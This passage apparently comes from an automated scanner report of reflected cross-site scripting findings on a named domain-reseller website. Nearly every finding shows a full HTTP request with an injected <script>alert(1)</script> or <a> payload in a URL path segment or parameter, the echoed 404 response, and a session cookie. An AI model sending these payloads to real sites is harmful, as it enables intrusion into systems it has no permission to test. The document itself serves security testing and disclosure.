User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themesb0ab7<script>alert(1)</script>ca6a890f4c1/kosmos/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5025. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f44a8<script>alert(1)</script>049191ac76d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmosf44a8<script>alert(1)</script>049191ac76d/images/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmosf44a8<script>alert(1)</script>049191ac76d/images/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5026. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d5278<script>alert(1)</script>8b7a8f8bf23 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/imagesd5278<script>alert(1)</script>8b7a8f8bf23/rating/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/imagesd5278<script>alert(1)</script>8b7a8f8bf23/rating/4half.gif was not found on this server.</p>
...[SNIP]...

2.5027. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 1cc6a<script>alert(1)</script>fd88c351b58 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating1cc6a<script>alert(1)</script>fd88c351b58/4half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating1cc6a<script>alert(1)</script>fd88c351b58/4half.gif was not found on this server.</p>
...[SNIP]...

2.5028. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/4half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/4half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 91196<script>alert(1)</script>4084a01f859 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/4half.gif91196<script>alert(1)</script>4084a01f859 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/4half.gif91196<script>alert(1)</script>4084a01f859 was not found on this server.</p>
...[SNIP]...

2.5029. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/4half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/4half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e7740<script>alert(1)</script>13bc604d02f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/4half.gif?e7740<script>alert(1)</script>13bc604d02f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:48:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/4half.gif?e7740<script>alert(1)</script>13bc604d02f=1 was not found on this server.</p>
...[SNIP]...

2.5030. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e366b<script>alert(1)</script>8bd7bc214e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicee366b<script>alert(1)</script>8bd7bc214e0/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicee366b<script>alert(1)</script>8bd7bc214e0/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5031. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 20b15<script>alert(1)</script>d9a97bba1e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names20b15<script>alert(1)</script>d9a97bba1e5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names20b15<script>alert(1)</script>d9a97bba1e5/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5032. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 644c0<script>alert(1)</script>199051a3fd2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes644c0<script>alert(1)</script>199051a3fd2/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes644c0<script>alert(1)</script>199051a3fd2/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5033. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 73005<script>alert(1)</script>2488baee5ac was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos73005<script>alert(1)</script>2488baee5ac/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos73005<script>alert(1)</script>2488baee5ac/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5034. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e15c3<script>alert(1)</script>d89a724811 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/imagese15c3<script>alert(1)</script>d89a724811/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/imagese15c3<script>alert(1)</script>d89a724811/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5035. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload daf8c<script>alert(1)</script>95a5b316dc1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/ratingdaf8c<script>alert(1)</script>95a5b316dc1/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/ratingdaf8c<script>alert(1)</script>95a5b316dc1/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5036. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 55483<script>alert(1)</script>d166c3a5a8d was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/search.php55483<script>alert(1)</script>d166c3a5a8d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/search.php55483<script>alert(1)</script>d166c3a5a8d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5037. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 88295<a>f2577e9d880 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search88295<a>f2577e9d880&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search88295<a>f2577e9d880&opt=2 was not found on this server.</p>
...[SNIP]...

2.5038. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c45bf<a>e067c7c9de1 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...c45bf<a>e067c7c9de1&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...c45bf<a>e067c7c9de1&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5039. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7c5d5<script>alert(1)</script>ee24d96d979 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&7c5d5<script>alert(1)</script>ee24d96d979=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&7c5d5<script>alert(1)</script>ee24d96d979=1 was not found on this server.</p>
...[SNIP]...

2.5040. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ca195<a>23e73410ff9 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ca195<a>23e73410ff9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ca195<a>23e73410ff9 was not found on this server.</p>
...[SNIP]...

2.5041. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 28054<script>alert(1)</script>7fbeb67cd08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service28054<script>alert(1)</script>7fbeb67cd08/domain-names/themes/kosmos/images/review/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service28054<script>alert(1)</script>7fbeb67cd08/domain-names/themes/kosmos/images/review/ was not found on this server.</p>
...[SNIP]...

2.5042. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/review/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/review/

Issue detail

